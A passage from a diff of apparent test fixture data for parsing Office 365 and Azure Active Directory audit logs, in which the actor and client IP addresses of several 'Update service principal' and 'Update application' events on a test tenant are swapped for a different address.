-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -19706,9 +19706,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { @@ -19923,7 +19923,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -19953,9 +19953,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { @@ -20158,7 +20158,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\